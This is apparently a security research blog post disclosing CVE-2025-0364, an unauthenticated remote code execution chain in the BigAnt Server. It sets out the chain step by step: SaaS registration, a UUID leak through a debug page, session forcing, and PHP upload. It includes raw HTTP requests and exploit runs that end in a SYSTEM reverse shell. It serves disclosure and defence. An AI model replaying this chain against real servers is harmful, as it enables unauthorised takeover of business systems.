The BigAntSoft BigAnt Server, which provides a Windows hosted on-premises chat server that focuses on business use cases, is vulnerable to unauthenticated remote code execution via account registration and PHP file uploads. The vulnerability takes advantage of a default exposed SaaS registration that allows an attacker to solve a simple CAPTCHA and then create an administrative user that can upload to the Cloud Storage Add-in. The system allows for the upload of PHP files that can trigger without authentication, leading to a exploit chain of no-authentication to remote code execution in all current, 5.6.06, and below versions.
The VulnCheck team identified this vulnerability during the triage of CVE-2024-54761, which turned out to require administrator access and had an incorrect CVSS Privileges Required (PR) value. The VulnCheck team identified a few quick indicators of insecure programming practices and chose to investigate deeper, leading to the discovery of this authentication bypass and file upload remote code execution. At the time of discovery there were roughly 50 BigAnt servers on the internet and at the time of publishing this blog there were around 30 identifiable instances.
Shells & Exploit Preamble
In summary, an attacker can gain full remote code execution unauthenticated via a chain of 10 requests. The VulnCheck Initial Access Intelligence has published the public exploit:
The following shows the exploit in action:
poptart@grimm:~/src/initial-access/feed/cve-2025-0364 $ ./build/cve-2025-0364_linux-amd64 -rhost -rport 8000 -lhost -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6
time=2025-01-09T14:50:18.502-07:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting TLS listener on"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting target" index=0 host= port=8000 ssl=false "ssl auto"=false
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Validating Bigantsoft Bigant Server target" host= port=8000
time=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg="Target verification succeeded!" host= port=8000 verified=true
time=2025-01-09T14:50:18.620-07:00 level=STATUS msg="Running a version check on the remote target" host= port=8000
time=2025-01-09T14:50:18.650-07:00 level=VERSION msg="The reported version is 5.6.06" host= port=8000 version=5.6.06
time=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host= port=8000 vulnerable=yes
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Password that will be used for authentication: kyLZiAddnH"
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Registering SaaS org: LBJCUE ( with password: kyLZiAddnH"
time=2025-01-09T14:50:18.675-07:00 level=STATUS msg="Getting new PHP session and pinning the SaaS org to the session"
time=2025-01-09T14:50:18.747-07:00 level=STATUS msg="Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0"
time=2025-01-09T14:50:18.764-07:00 level=STATUS msg="Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3"
time=2025-01-09T14:50:18.765-07:00 level=STATUS msg="Activating SaaS organization"
time=2025-01-09T14:50:22.627-07:00 level=STATUS msg="Authenticating to the addin SaaS admin"
time=2025-01-09T14:50:22.673-07:00 level=STATUS msg="Visiting SaaS addin cloud drive page"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Attempting to upload `JQsaYCKEOu.php` to cloud drive addin"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Attempting to trigger final payload, timeout is expected after callback"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Requesting final payload at:"
time=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg="Caught new shell from"
time=2025-01-09T14:50:22.821-07:00 level=STATUS msg="Active shell from"
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\BigAntSoft\IM Console\im_webserver\htdocs\data\387360F0-EECD-622B-5B90-C37F2BBD45B3\pan\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\2025-01-09>whoami
nt authority\system
While the shells are always great, the full path of discovery to exploitation can be just as valuable than the exploit.
Authentication Paths & SaaS Organizations
After having the initial disappointing run in with a bad CVSS score assignment(PR is wrong so often), we decided to see if it was possible to quickly identify an authentication bypass vulnerability to amend the sins of the first CVSS score. The investigation combined static analysis with some simple fuzzing of paths to identify all unauthenticated endpoints before even diving too deep into application logic. The server utilizes the ThinkPHP framework, which is popular among Chinese vendors, and uses a model-view-controller design.
Investigation started with a quick enumeration of default exposed web pages later there were multiple views to landing pages that all appeared to be outside the standard
These are the exact red flags we look for; auto-filled QQ addresses and user information, no documentation, a custom CAPTCHA, and a mention of organizational registration. Non-user initiated role creation is often a good place to look for authentication bypasses as machine, API, or group accounts often don't follow expected single user logic. Filling out the information and solving the CAPTCHA, we land on the following success message:
The server then sends an email, if configured with proper SMTP settings, with the SaaS registration information and an activation link containing a UUID. As an attacker, it's not good to burn any emails in our control and leaving breadcrumbs and we do not want to rely on the SMTP server having a complete configuration, so it was time to see if we could get the registration activation variables without configured SMTP or an email. It was time to dig in and see what's happening in these requests to see if there's anything we can use.
ThinkPHP allows you to embed functions inside of HTML forms and other backend content that corresponds to the HTML file field information. This means that functions inside the HTML files can be called to the corresponding controller functions. We can verify this by checking that the HTML file calls the
<extend name="Public/base" />
<block name="main">
<form id="form" action="{:U('reg_email_post')}" method="post">
<div class="form-box">
<div class="form-header">{:L('_SAAS_REGISTER_')}</div>
<div class="form-body">
<div class="form">
<div class="form-group">
<input type="text" name="saas_showname" id="saas_showname" placeholder="{:L('_SHOWNAME_')}" class="form-control required" minlength="2" maxlength="20">
<div class="form-group">
<input type="text" name="saas_name" id="saas_name" placeholder="{:L('_SAASNAME_')}" class="form-control required chrnum">
<div class="form-group">
<input type="text" name="org_email" id="org_email" placeholder="{:L('_EMAIL_')}" class="form-control required email">
<div class="form-group">
<input type="text" name="saas_pwd" id="saas_pwd" placeholder="{:L('_PASSWORD_')}" class="form-control required pwd" minlength="6" maxlength="20">
* 邮箱saas
* 1 新增SAAS
* 2 发送邮件
* 3 通过邮件地址激活SAAS
function reg_email_post(){
$res = $this->reg_saas(0);
$url = sp_get_host() . U('reg_activation',array('saas_id'=>$saasId)) ; //生成激活的URL地址
$content = str_replace('[url]',$url,$content);
$content = str_replace('[minute]',$M->activation_expire_miniute,$content);
$res =sp_send_mail($data['org_email'], $subject, $content) ;
if ($res){
$url = U('reg_email_ok',array('saas_id'=>$saasId));
$this->success(L('_ADD_SUCCESS_'), $url);
Based on some light ThinkPHP knowledge, we know that the application utilizes a
* 注册SAAS
* @param number $status
* @param number $is_send_activation_email 是否发送激活邮件(官方注册,外面发送)
* @return number|unknown
function reg_saas($status = 0,$is_send_activation_email = 1){
$M = D('Common/Saas');
$M->is_send_activation_email = $is_send_activation_email ;
$data = $M->create();
if (!$data){
return sp_api_fail(0, $M->getError()) ;
$data['saas_status'] = $status ;
$res = $M->add($data);
if ($res && $status){
$param = $M->where(array('saas_name'=>$data['saas_name']))->field('saas_id')->find();
\Common\Lib\AntCmd::execUpdatePack(CMD_SAAS_UPDATE, $param['saas_id']) ;
if ($res){
return sp_api_success($data);
return sp_api_fail(0, $M->getError()) ;
There's a lot more ThinkPHP logic that handles the MVC components that wasn't worth stepping through, so when in doubt
-- ----------------------------
-- Table structure for sys_saas
-- ----------------------------
CREATE TABLE `sys_saas` (
`SAAS_ID` varchar(50) NOT NULL DEFAULT '',
`SAAS_NAME` varchar(100) DEFAULT '',
`SAAS_SHOWNAME` varchar(100) DEFAULT '',
`SAAS_DBNAME` varchar(50) DEFAULT '',
`SAAS_DESC` varchar(255) DEFAULT '',
`SAAS_CREATE_DATE` bigint(20) DEFAULT '0',
`ORG_CONTACT` varchar(50) DEFAULT '',
`ORG_PHONE` varchar(50) DEFAULT '',
`ORG_ADDRESS` varchar(255) DEFAULT '',
`ORG_EMAIL` varchar(50) DEFAULT '',
`ORG_FAX` varchar(50) DEFAULT '',
`ORG_POSTCODE` varchar(50) DEFAULT '',
`AUTH_NUMBERS` varchar(100) DEFAULT '0',
`AUTH_CODE` varchar(2000) DEFAULT '',
`AUTH_EXPIREDATE` varchar(255) DEFAULT '0',
`SAAS_PWD` varchar(50) DEFAULT '',
Great, now we have the corresponding table that handles SaaS registration and we just need to verify that our data is in the database. Another quick little grep for the MySQL connection string shows the following:
29: $dbconfig['DB_TYPE']='mysql' ;
55: $conns[] = array('mysql','','3306','root','','antdbms_aipu');
85: //$conns[] = array('mysql','','3306','root','','antdbms_aipu');
214: //var_dump(function_exists('mysql_connect'));
Sure enough, a quick MySQL connection on the server later with
This validates that the entries are actually be created with the data we provided, and shows that we need to figure out a way to get access to the
Debug Activation UUID Leak
A quick glance through the application logic shows that we need to look for instances where
function sp_saas_id(){
if (! $_SESSION['saas'])
return '';
return $_SESSION['saas']['saas_id'];
Some static analysis (ripgrep my dearest) allowed us to identify roughly ~200 instances of
<!DOCTYPE html>
<meta charset="utf-8">
<link href="__PUBLIC__/static/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link href="__PUBLIC__/static/bootstrap/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="__PUBLIC__/{$Think.MODULE_NAME}/css/site.css" rel="stylesheet">
<script src="__PUBLIC__/static/jquery.js"></script>
<volist name="list" id="module" key="i">
<volist name="module['methods']" id="method">
<a id="{$module['name']}_{$method['name']}"></a>
<form method="post" target="_blank" action="/api/{$module['name']}/{$method['name']}.html" enctype="multipart/form-data">
<div class="cmd">
<a href="#" class="clear">{:L('_CLEAN_SELECT_OPTIONS_')}</a>
<div class="item-option">
<label> ssid</label>
<input type="text" name="ssid" value="{:sp_saas_id()}">
<span class="intro">SAAS ID</span>
<div class="item-option">
<label><i>*</i> uid</label>
Opening up this page in a empty session shows the following demo page, which contains almost all API calls but most importantly fills the forms with the called
What's up with the
It turns out that SaaS ID from the application gets assigned to the first created
Forcing SaaS Session
This time, we weren't quite as lucky to find a session assigned variable in a debug page, nor a quick function call. Looking for all interactions with identified SaaS variable names gave us quite a few places to look. Ironically, some manual review showed that the primary login page index function contained some suspicious looking code at
* 登录
public function index(){
$to = I('to','admin','htmlspecialchars') ;
$app = I('app');
$saas = I('saas');
if (! $saas) {
$saas = cookie('saas');
//20170418 针对只有一个SAAS的企业,默认给出企业ID
$M = D('Common/Saas');
$data = null ;
if ($saas){
//20170518 如果是登妨系统管理台,那个数据库密码如果是 默认密码,那么显示出来
$data = $M->where(array('saas_name'=>$saas))->fetchSql(false)->select();
if (! $data){
$data = $M->fetchSql(false)->select();
$saas = $data[0]['saas_name'] ;
//20170419 加入默认的帐号
$account = htmlspecialchars($_COOKIE['account']) ;
if (! $account){
$account = 'superadmin';
$this->assign('saas',$saas) ;
$this->assign('account',$account) ;
$this->assign('metaTitle',C('PRODUCT_NAME') . ' ' . L('_LOGIN_TITLE_')) ;
$this->assign('to',$to) ;
$this->assign('app',$app) ;
$this->assign('flag',I('flag')) ;
In summary, the main login page index function will look for an assigned
In order to test this we can request the login page with a
GET /index.php/Home/Login/index.html HTTP/1.1
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: saas=aaa
Then, take the session cookie from the above request and revisit the demo page to trigger the
Bingo. We have tied the
All that's left is to verify the original hypothesis and attempt to complete the registration of the SaaS organization. The core function for registration activation lives in
* 激活SAAS
* 1、获得SAAS
* 2、判断是否超时
* 3、判断是否激活
* 4、激活SAAS
function reg_activation(){
$saasId = I('saas_id');
$M = D('Common/Saas');
$info = $M->find($saasId) ;
if (!$info){
$this->error(L('_ACTIVATION_ERROR_NODATA_')) ;
if ($info['saas_status']){
$this->error(L('_ACTIVATION_ERROR_ALREALY_')) ;
if ($M->isExpire($info['saas_create_date'])){
$this->error(L('_ACTIVATION_ERROR_EXPIRE_')) ;
$saasName = $info['saas_name'] ;
$res = $M->activationSaas($saasName) ;
if ($res){
$url = U('reg_complete',array('saas'=>$saasName));
$this->success(L('_ACTIVATION_SUCCESS_'), $url);
If the activation data is correct and the
* 激活SAAS
* @param unknown $saasName 企业ID (在LINUX上安装的时候会出现SAASID变成1,不知道什么原因,所以这里用企业ID来判断)
* @param unknown $password 明文密码 用于发邮件
public function activationSaas($saasName){
$where['saas_name'] = $saasName;
$info = $this->where($where)->find();
$saasId = $info['saas_id'];
$saasName = $info['saas_name'];
$dbName = $info['saas_dbname'];
$adminPassword = $info['saas_pwd'];
$installDate = $info['saas_installdate'] ;
if (! $info){
return false ;
$res = $this->createDB($info);
if ($res){
$M = D('Ms/server');
$server = $M->where(array('server_type',2))->find();
if ($server){
$serverId = $server['server_id'];
$sql = " insert into sys_saas_server(gid,saas_id,login_server_id,server_is_mast) values('" . sp_get_guid(). "','$saasId','$serverId',1)" ;
$data['saas_status'] = 1 ;
$data['saas_id'] = $saasId ;
if (! $installDate){
$data['saas_installdate'] = \Common\Lib\AntCmd::getTryCode();
$data['auth_numbers'] = \Common\Lib\AntCmd::encrypt(50);
$data['auth_expiredate'] = \Common\Lib\AntCmd::encrypt(strtotime(date('Y-m-d H:i:s',strtotime('+15 day'))));
if ($this->is_send_activation_email){
return true ;
This successfully activates the SaaS organization and sets up the organization with the data we initially registered with. Time to test the activation of our initial organization:
POST /index.php/Home/Saas/reg_activation HTTP/1.1
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Cookie: PHPSESSID=5q37l00e0alpb5euu40403tj3e;
Connection: keep-alive
The server then responds with a "Activate successfully" and a little smiley face:
HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 19:52:29 GMT
Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g PHP/7.4.14
X-Powered-By: ThinkPHP
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Length: 1655
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
*{ padding: 0; margin: 0; }
body{ background: #fff; font-family: '微软雅黑'; color: #333; font-size: 16px; }
.system-message{ padding: 24px 48px; }
.system-message h1{ font-size: 100px; font-weight: normal; line-height: 120px; margin-bottom: 12px; }
.system-message .jump{ padding-top: 10px}
.system-message .jump a{ color: #333;}
.system-message .success,.system-message .error{ line-height: 1.8em; font-size: 36px }
.system-message .detail{ font-size: 12px; line-height: 20px; margin-top: 12px; display:none}
<meta name="__hash__" content="5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c" /><meta name="__hash__" content="5cdc38b49dc8bdbfced7bbdaaa44f6c0_5351a56337376881b051417c1a46545c" /></head>
<div class="system-message">
<p class="success">Activate successfully</p>
<p class="detail"></p>
<p class="jump">
We now have an activated SaaS org and the information on how to authenticate to the system. In order to actually do this and to see what we can do post-authentication, we need to first find where to use these credentials.
"Cloud Drive" Authentication & Just Upload PHP I Guess
Using the data from the first initial crawl for unauthenticated pages we quickly identified that
The only information that we didn't submit in the initial registration was the username. A quick cross-reference in the database with the newly created SaaS organization in
We have officially confirmed and validated authentication. Instead of going straight for the SQL injection in the original CVE, Plus, the "Cloud Disk" is intriguing and didn't match much of the code I'd seen used in the rest of the application. Let's see what happens when we go to the Cloud Disk:
Clicking on the Personal Cloud Disk link in the Drive page immediately leads us to the following page:
Oh goodie a upload page. We are building a tower, but entirely made out of red flags.
If you immediately started thinking of MIME type sniffing bypasses or extension tricks on Windows related to recent disclosures, I applaud you but you might be overthinking. Let's just try and upload some PHP:
<?php echo "oh no..."; ?>
The application happily accepts our very hard fought PHP file and happily presents the uploaded PHP file:
The preview options and other interaction pages will not work, but the HTML references the page just fine at
Sometimes the silliest things work the best. We officially have a full exploit chain to go from no authentication to arbitrary PHP execution. Let's automate and mature it into an exploit.
Automation with go-exploit
In summary, the vulnerability requires the following HTTP requests to achieve full code execution:
- Get the CAPTCHA and CSRF tokens.
- Solve CAPTCHA manually.
- Register a new SaaS organization with the CAPTCHA and CSRF tokens from steps 1 & 2 with registration settings.
- In a new session, request the login page with a saas=cookie set to the new organization in step 3, this causes the new session to be bound to the SaaS instance the attacker just registered.
- Use the session cookie from step 4 to request the demo page that displays SaaS UUID, requiring the bound SaaS session or else the application will bind the session to the default SaaS organization which is not known to the attacker.
- Activate the registered organization with the SaaS UUID acquired in step 5.
- Authenticate to the "Cloud Drive" page with the adminaccount of the organization and the attacker controlled registration data.
- Get the Cloud Drive root IDs, UUIDs, date in YYYY-MM-DDformat, and path information in order to know where the file is accessible.
- Upload a PHP payload, note the paths and upload dates.
- Trigger the PHP shell with the paths without authentication.
This is the perfect opportunity to use go-exploit to create a small self contained exploit. All said and done the exploit was only roughly ~350 lines of code. The framework is the exact same system that the VulnCheck Initial Access Intelligence team uses to quickly create self-contained and mature exploits, and we are giving out our copy of CVE-2025-0364 to show off how well it works for situations like this:
For the moment of truth, retrieve the CAPTCHA and pre-conditions for the exploit:
poptart@grimm:~/src/initial-access/feed/cve-2025-0364 $ ./build/cve-2025-0364_linux-amd64 -rhost -rport 8000 -v -c -e
time=2025-01-09T14:49:56.227-07:00 level=STATUS msg="Starting target" index=0 host= port=8000 ssl=false "ssl auto"=false
time=2025-01-09T14:49:56.227-07:00 level=STATUS msg="Validating Bigantsoft Bigant Server target" host= port=8000
time=2025-01-09T14:49:56.272-07:00 level=SUCCESS msg="Target verification succeeded!" host= port=8000 verified=true
time=2025-01-09T14:49:56.272-07:00 level=STATUS msg="Running a version check on the remote target" host= port=8000
time=2025-01-09T14:49:56.301-07:00 level=VERSION msg="The reported version is 5.6.06" host= port=8000 version=5.6.06
time=2025-01-09T14:49:56.301-07:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host= port=8000 vulnerable=yes
time=2025-01-09T14:49:56.301-07:00 level=STATUS msg="CAPTCHA flags not set, retrieving captcha-hash"
time=2025-01-09T14:49:56.317-07:00 level=STATUS msg="Open the following page in a browser and solve the CAPTCHA:"
time=2025-01-09T14:49:56.317-07:00 level=STATUS msg="Solve CAPTCHA and pass the following flags to this exploit: `-captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha <SOLVED CAPTCHA>`"
Solve the CAPTCHA and fire away to get a good ol'
poptart@grimm:~/src/initial-access/feed/cve-2025-0364 $ ./build/cve-2025-0364_linux-amd64 -rhost -rport 8000 -lhost -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6
time=2025-01-09T14:50:18.502-07:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting TLS listener on"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting target" index=0 host= port=8000 ssl=false "ssl auto"=false
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Validating Bigantsoft Bigant Server target" host= port=8000
time=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg="Target verification succeeded!" host= port=8000 verified=true
time=2025-01-09T14:50:18.620-07:00 level=STATUS msg="Running a version check on the remote target" host= port=8000
time=2025-01-09T14:50:18.650-07:00 level=VERSION msg="The reported version is 5.6.06" host= port=8000 version=5.6.06
time=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host= port=8000 vulnerable=yes
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Password that will be used for authentication: kyLZiAddnH"
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Registering SaaS org: LBJCUE ( with password: kyLZiAddnH"
time=2025-01-09T14:50:18.675-07:00 level=STATUS msg="Getting new PHP session and pinning the SaaS org to the session"
time=2025-01-09T14:50:18.747-07:00 level=STATUS msg="Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0"
time=2025-01-09T14:50:18.764-07:00 level=STATUS msg="Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3"
time=2025-01-09T14:50:18.765-07:00 level=STATUS msg="Activating SaaS organization"
time=2025-01-09T14:50:22.627-07:00 level=STATUS msg="Authenticating to the addin SaaS admin"
time=2025-01-09T14:50:22.673-07:00 level=STATUS msg="Visiting SaaS addin cloud drive page"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Attempting to upload `JQsaYCKEOu.php` to cloud drive addin"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Attempting to trigger final payload, timeout is expected after callback"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Requesting final payload at:"
time=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg="Caught new shell from"
time=2025-01-09T14:50:22.821-07:00 level=STATUS msg="Active shell from"
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\BigAntSoft\IM Console\im_webserver\htdocs\data\387360F0-EECD-622B-5B90-C37F2BBD45B3\pan\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\2025-01-09>whoami
nt authority\system
C:\Program Files (x86)\BigAntSoft\IM Console\im_webserver\htdocs\data\387360F0-EECD-622B-5B90-C37F2BBD45B3\pan\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\2025-01-09>^C
Sometimes an incorrectly categorized CVSS vector is all it takes to motivate you to find something interesting.
About VulnCheck
The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild, PaperCut Exploitation, ProjectSend CVE-2024-11680 Exploited in the Wild, Fileless Remote Code Execution on Juniper Firewalls , and Does Confluence Dream of Shells?
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